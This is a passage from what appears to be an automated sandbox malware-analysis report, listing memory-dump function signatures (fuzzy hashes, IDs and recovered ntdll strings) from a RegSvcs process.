                                                              • Opcode Fuzzy Hash: aa202f814b564eabbddd6b0b9124eacc10859c5efe3c8ea085f5a1341b259f0b
                                                              • Instruction Fuzzy Hash: 71410131A01A69CBEB229BE9CC44BACBBB8FF96340F244459D901EF381DB758901CF51
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01614888
                                                              • LdrpCheckRedirection, xrefs: 0161488F
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01614899
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              • Opcode ID: 2f87cb72fec8fa5d708c61dbbf0f6274d5fc7e18c8ce65d3c7eefbb2cf6af616
                                                              • Instruction ID: e6c1565e1e20f6a50ebd16a337b9993ac8a317f6d54e2d2684df811a1e8e1e8f
                                                              • Opcode Fuzzy Hash: 2f87cb72fec8fa5d708c61dbbf0f6274d5fc7e18c8ce65d3c7eefbb2cf6af616
                                                              • Instruction Fuzzy Hash: 2641C172A046519FCB62CE6CDC40A267BE9BF49B90F0E066DED499B359DB30D801CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              • Opcode ID: a63a6729dfc6857c4b7e1c2c7f23d6260b878a1f80deb7c44ff02a468e0c1d5e
                                                              • Instruction ID: cde7c993a81f93480e6dadb452fbf354d9102a9e1a21cdae6727c3ed7337bbeb
                                                              • Opcode Fuzzy Hash: a63a6729dfc6857c4b7e1c2c7f23d6260b878a1f80deb7c44ff02a468e0c1d5e
                                                              • Instruction Fuzzy Hash: 1D11DC313B41069FDB29DA28C848B6EB3A8FF80A16F18856DF506CF291EB34E841C754
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01612104
                                                              • LdrpInitializationFailure, xrefs: 016120FA
                                                              • Process initialization failed with status 0x%08lx, xrefs: 016120F3
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: 3d024ac136c10fb3b156c0fa01b52034fd525324b1302916ca5e04578d2e895a
                                                              • Instruction ID: 82ed088170871627eab7cf2df1020d1b3ee2f87abb402bfa4fa9cc247ef5346e
                                                              • Opcode Fuzzy Hash: 3d024ac136c10fb3b156c0fa01b52034fd525324b1302916ca5e04578d2e895a
                                                              • Instruction Fuzzy Hash: 2EF02234640309BBE724E64DDC53FAA3B68FB40B04F24045CFB006B785D2B0E980C684
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: 60f6b0faa07c47b0d6657a799b9c9f341a7de3d2fe24bb2c6dd8a6ac6c02d17e
                                                              • Instruction ID: caae78899ba3c019b759af512f8b2a7a2d4815e10baaa71677096e014533ce93
                                                              • Opcode Fuzzy Hash: 60f6b0faa07c47b0d6657a799b9c9f341a7de3d2fe24bb2c6dd8a6ac6c02d17e
                                                              • Instruction Fuzzy Hash: 4D715D71A0014ADFDB11DFA8C990BAEB7F8FF48344F144069EA05EB291E634ED41CBA0
                                                              Strings
                                                              • LdrResSearchResource Exit, xrefs: 0159AA25
                                                              • LdrResSearchResource Enter, xrefs: 0159AA13
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              • Opcode ID: ed75efd26afe91f5355411e8a6912c2c24fd5a573488b9fc7d7f0ecb7e0b34c3
                                                              • Instruction ID: 2cc58f759065872adc2c06ce2fbe586920ba84f9b42e685cc1e57b41e3a4897e
                                                              • Opcode Fuzzy Hash: ed75efd26afe91f5355411e8a6912c2c24fd5a573488b9fc7d7f0ecb7e0b34c3
                                                              • Instruction Fuzzy Hash: 90E15171A002199FEF22CE99C984BAEBBBAFF44314F14452AEA11EF251D774D940CB61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: 46bf9d5aa0e49a6f98937b1f546f2cef9a9a5bd7f0d1cade37b8c344fc50d197
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: D4C1BF312043429BEB65CFA8CC41B6BBBE6BFC4318F084A2DFA968B291D775D505CB51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: 590b6f9aee0e2498c77b2501a929dcc6e7e03c67939115fc4ac1768e44020e10
                                                              • Instruction ID: 6e3a0a466c9a581836b7d34cadcb67ee424e89d88cf4a286ec762894a8f0b948
                                                              • Opcode Fuzzy Hash: 590b6f9aee0e2498c77b2501a929dcc6e7e03c67939115fc4ac1768e44020e10
                                                              • Instruction Fuzzy Hash: F7614171E046199FDB29DFA8CC40BAEBBB9FB44700F15486EE649EB291D7319901CB50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              • Opcode ID: 4eb0bb5793919812ae047da061cd3b2ceb3e7e444212e009365c807bfa7cb036
                                                              • Instruction ID: 80ee57c2bc3b5ab7a66f3caed0bea8fe952e138b7ac453cd14e9372f070a5047
                                                              • Opcode Fuzzy Hash: 4eb0bb5793919812ae047da061cd3b2ceb3e7e444212e009365c807bfa7cb036
                                                              • Instruction Fuzzy Hash: 12510871E0021EAEDF11DFA9CC90AEEBBB9FB84754F104529E611AB290DB749905CB60
                                                              Strings
                                                              • kLsE, xrefs: 01590540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0159063D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: 0b5c8fdca190b570f947a3c5990e41aeb8c6eda46b4814543564f76cf09f7fc5
                                                              • Instruction ID: c045c69b439c6e2276934af09093cb9bf7bfd8ef7f5a5cfb27137e803150397e
                                                              • Opcode Fuzzy Hash: 0b5c8fdca190b570f947a3c5990e41aeb8c6eda46b4814543564f76cf09f7fc5
                                                              • Instruction Fuzzy Hash: AE51B0715047429BDB24DF68C5406ABBBE9BFC4304F104C3EEA9A8B281E734D545CB92
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0159A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0159A2FB
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: 98e045a751d2da57daed018879231db87a1fdf968a984e93af757a5deafb5ff5
                                                              • Instruction ID: dab72030c4982cf8e8fd713ec913080950cf7c2fe30a1335dd2b963afb0e9e70
                                                              • Opcode Fuzzy Hash: 98e045a751d2da57daed018879231db87a1fdf968a984e93af757a5deafb5ff5
                                                              • Instruction Fuzzy Hash: F7418C71A0464ADBDB11CF59C840B6EBBF4FF84704F1444A9EE00DF295E2B5D940CBA2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: 063f751863b1a1ee458660fcad87b801983d5d153682114944f51a315432e6d2
                                                              • Instruction ID: 3ea5c3ae1ba7a6773c76e9554682b9610451a4ef26cb1637c3cc331e3a886b8b
                                                              • Opcode Fuzzy Hash: 063f751863b1a1ee458660fcad87b801983d5d153682114944f51a315432e6d2
                                                              • Instruction Fuzzy Hash: A001D1B2654748AFD321DF64CD45B167BE8F784B19F00893DA648CB190F374D844CB46
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: ac4f5ed3d8d09c2a5d625e9dc1e004d780641804e4e48da2e032205c201ab9a4
                                                              • Instruction ID: 65ff8d832bff0c4d81e18df79926ba7042df25794d9ae8271257ea0f20f25538
                                                              • Opcode Fuzzy Hash: ac4f5ed3d8d09c2a5d625e9dc1e004d780641804e4e48da2e032205c201ab9a4
                                                              • Instruction Fuzzy Hash: 5F826A75E002198FEF25CFA9C980BEDBBB5BF48310F148169E919AF391D770A941CB52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 1581faa1144ada766ce92ca7ef059f960b794cb24c35fe367aea4d1b7510a0f8
                                                              • Instruction ID: e2ddae38a2fe650344882bd47bd052e34b5f0b66d1beaca83b9e28b7337923d6
                                                              • Opcode Fuzzy Hash: 1581faa1144ada766ce92ca7ef059f960b794cb24c35fe367aea4d1b7510a0f8
                                                              • Instruction Fuzzy Hash: 0F916071A4121AAFEB21DF99CC85FAEBBB9FF54750F144065F600AB294D774AD00CBA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 5eac0587ce231e35b948078d0d73e72a3a587bd1f21dff68a00c3df885a7228d
                                                              • Instruction ID: 2730c4c7b9c06213efd93c4554560399c4cecc59d145b692d2bd5312c4f0f446
                                                              • Opcode Fuzzy Hash: 5eac0587ce231e35b948078d0d73e72a3a587bd1f21dff68a00c3df885a7228d
                                                              • Instruction Fuzzy Hash: 1B91803190150ABEEB22AFA5DC44FAFBB79FFC5744F100029F501AB250D7769902CBA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: 7a33ecc541f95399652535e51796f887c7aa3be0dec58b60b6200a7fa9c335ea
                                                              • Instruction ID: 68a78e46a734cb9974799164a33210d45bf26772d98b073e29884b59d85002a6
                                                              • Opcode Fuzzy Hash: 7a33ecc541f95399652535e51796f887c7aa3be0dec58b60b6200a7fa9c335ea
                                                              • Instruction Fuzzy Hash: 7C714175E0021A9FDF19CF9CD9906AEBBB1BF88710F14812DE505AB381E7719951CB60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              • Opcode ID: cdb59990749f9ca95a40806ca1f91250ce37740cc5162cc548e4677b191b3c47
                                                              • Instruction ID: 51e690ce4e3e2ccb8db6a00189169f56d19f7049c6adb8c69ab9ffba47b8e9f3
                                                              • Opcode Fuzzy Hash: cdb59990749f9ca95a40806ca1f91250ce37740cc5162cc548e4677b191b3c47
                                                              • Instruction Fuzzy Hash: 61518372D0022A9BDF14DF99DC40AAEFBB4BF84650F05416AE911BB354DB749C02CBE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: f263eb9b8fa4944cd562b70084cf9e4837507744087c0e2752b84fecd7019f43
                                                              • Instruction ID: db6d926acd5ee29a2f62cf14281278c9dfe8de447f141fbac7dc718867b71fb0
                                                              • Opcode Fuzzy Hash: f263eb9b8fa4944cd562b70084cf9e4837507744087c0e2752b84fecd7019f43
                                                              • Instruction Fuzzy Hash: 2F4181725483429BD710DA79C981B6FBBE8FFC8614F84092DF684DF180E674D904C7A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: f9f71523bd7147b5f336ce14459495fcf6eb7f3c5e6486ddca83ead7b0f7274d
                                                              • Instruction ID: b4779608049adb8cddab0aeb9425a605efc8c49f28f5041facceb236eae3ab10
                                                              • Opcode Fuzzy Hash: f9f71523bd7147b5f336ce14459495fcf6eb7f3c5e6486ddca83ead7b0f7274d
                                                              • Instruction Fuzzy Hash: F14145B1D0052DABDB21DA54CC84FDFB77DAB45714F0146E5EA08AB180DB709E898F98
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: 9f978518afac21f0d57b059d7afb8ee5a0993be762c72ae7c601e2aa28085425
                                                              • Instruction ID: 21783af9cb31f6a3f9a746dfc93ba47b54d53cb79f1a697bc3e310a0d435d6c8
                                                              • Opcode Fuzzy Hash: 9f978518afac21f0d57b059d7afb8ee5a0993be762c72ae7c601e2aa28085425
                                                              • Instruction Fuzzy Hash: 9431E531B00A699AEB22EB69CC50BEE7BA8EF44704F544068ED41AF282D775D815CF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              • Opcode ID: 2c9469abf03b4bcfafef18f3bb5afb03fdf4d24e4490cb0d0bff1083b643deb8
                                                              • Instruction ID: 8d1591ce9ace2496ce715455c37ad7adc111679dc7319c2b03fe24f27390891e
                                                              • Opcode Fuzzy Hash: 2c9469abf03b4bcfafef18f3bb5afb03fdf4d24e4490cb0d0bff1083b643deb8
                                                              • Instruction Fuzzy Hash: F031E536900916AFEB1ADA59CC55E6FBB74FF80710F1142A9E905AB290D730DE04DBE0
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0161895E
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              • Opcode ID: 8248e92661356623c9f6ab55b7a90bda3e52aac5063590d5937e1a62f61f2c8c
                                                              • Instruction ID: 64b8d1d6ac23d240c278e710413ebece4d8e6be205238496725b71cfed1c5e57
                                                              • Opcode Fuzzy Hash: 8248e92661356623c9f6ab55b7a90bda3e52aac5063590d5937e1a62f61f2c8c
                                                              • Instruction Fuzzy Hash: A901F732610202AFE7346E5D9C94A6A7B6AFFC57A4B0C191CF6421B669CF206881C796
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39187277d691cd4cb7c4e82ecaffca208e72f57aa55bdbbe96cd81deb39fdddb
                                                              • Instruction ID: f0b8d7cd69eae8425c0673d5410579b29b297d91ca66977e3e5f0fe0d9517c9b
                                                              • Opcode Fuzzy Hash: 39187277d691cd4cb7c4e82ecaffca208e72f57aa55bdbbe96cd81deb39fdddb
                                                              • Instruction Fuzzy Hash: 6942AF316083429BE725CF68CCA0A6BBBE5BFC8700F49492DFA8297350D771D949CB52
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54e7ce91dabbee860db94c371294d9d7fadc5b9b24868337c764f2554439b833
                                                              • Instruction ID: 3c4ada9ff4a4903a70a9db42a631fad0c9de9f18feb378e6ce65a43c8751c857
                                                              • Opcode Fuzzy Hash: 54e7ce91dabbee860db94c371294d9d7fadc5b9b24868337c764f2554439b833
                                                              • Instruction Fuzzy Hash: 48424D75E006299FEB24CF69CC81BADBBF9BF88300F158199E949EB241D7349985CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad3e0d6e0384656a6fb7d03ad1d47bd046be0afc4655712d9e069992395fab8f
                                                              • Instruction ID: 20e116fe8f36b49dba8eb1f8b7fe8b52af07f57fb3636c27c12108de7816792c
                                                              • Opcode Fuzzy Hash: ad3e0d6e0384656a6fb7d03ad1d47bd046be0afc4655712d9e069992395fab8f
                                                              • Instruction Fuzzy Hash: C832DC70A007568FEB25CF69C8547BEBBF2BF84704F24451DE68A9F285DB35A842CB50
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8bf76c7a83cd4ffa5d1892498ab858c1384ebb42b6b530d0b2763a37b5b09089
                                                              • Instruction ID: 8aaef71b6924779f4fd435707c30a502e69509182f759f1cee77b31ee7ade9d1
                                                              • Opcode Fuzzy Hash: 8bf76c7a83cd4ffa5d1892498ab858c1384ebb42b6b530d0b2763a37b5b09089
                                                              • Instruction Fuzzy Hash: B622BE742046618BEB25CFADC894772BBF1AF85300F08855AE9D6CF386D735E452EB60
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58a8d3c3dae2d1d29ee0db5fac2e361c5d1d8c6c3e5787fc762381899c1cf192
                                                              • Instruction ID: 9812f7d706734afa15927172a42ec3b68331e03aa980b5826098f6ec9054a998
                                                              • Opcode Fuzzy Hash: 58a8d3c3dae2d1d29ee0db5fac2e361c5d1d8c6c3e5787fc762381899c1cf192
                                                              • Instruction Fuzzy Hash: E1328B75A00605CFDF25CFA8C880AAEBBF2FF88310F144569EA56AB391D734E845CB51
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction ID: fecccd2611f362c14b9f5defd40a7cc6a8d4797a8fcd2b8817c86ddc77684ad4
                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction Fuzzy Hash: DFF12D71E0021A9FDF25CF99D590AEEBBF5BF48710F048529EA06AF245E774D841CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4650ffbf900f7df5d51169bbe5facf3e32b699c93ed5a414a5720c49956fca17
                                                              • Instruction ID: 1694610eaa3fcbd57f15b1a710079bf895729335d8a18bc0588f716ca09cc3c3
                                                              • Opcode Fuzzy Hash: 4650ffbf900f7df5d51169bbe5facf3e32b699c93ed5a414a5720c49956fca17
                                                              • Instruction Fuzzy Hash: C6D1F271E00A2A8BDF15CF68CC41AFEB7F9BF88304F188169D955A7241D735E9068F60
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f8b0b3fb6ccb64d5825ca536856928e66d78dd9117cdc27c12115f223511ff5
                                                              • Instruction ID: 51a62ff285a59cbe19d572b5a8d7a922ecfaff33d3c8de607962444ddff3cc9d
                                                              • Opcode Fuzzy Hash: 5f8b0b3fb6ccb64d5825ca536856928e66d78dd9117cdc27c12115f223511ff5
                                                              • Instruction Fuzzy Hash: 1FE17F71508342CFCB15CF28C590A6EBBE1FF89314F05896DE9998B351EB31E909CB92
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af7c353b32be1fb83a68e6dcffe7335eab7dad780219f73022a7c8b3cae739f3
                                                              • Instruction ID: fb85fe095832ac08a465baebab75495ab4cba96992447acf10f48aea931d0bd8
                                                              • Opcode Fuzzy Hash: af7c353b32be1fb83a68e6dcffe7335eab7dad780219f73022a7c8b3cae739f3
                                                              • Instruction Fuzzy Hash: 83D1C071A006079BDB18EF69C890ABE77F5FF94308F544629E916EF290E734E950CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction ID: fc5bcf14e287fa5c9ccbfcd25cf61fb574695ad021e2e0eb0a9e3d972e0794df
                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction Fuzzy Hash: 2CB19375A00605AFDB25DF99CD40EABBBBEFF84304F18845DAA0297798DB34E905CB50
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: 5988b7d412e276c184cc3f547b391534933f4dfa8d8f6b3985983f7811b8dac2
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: 92B1F431610646AFDB25DBA8C850BBFBBF6BF88304F540559E6569F381EB30E941CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2215dca57fd01bab1afac735b0cdd01bb6c7d366cad7f7676c08d6a35ba24822
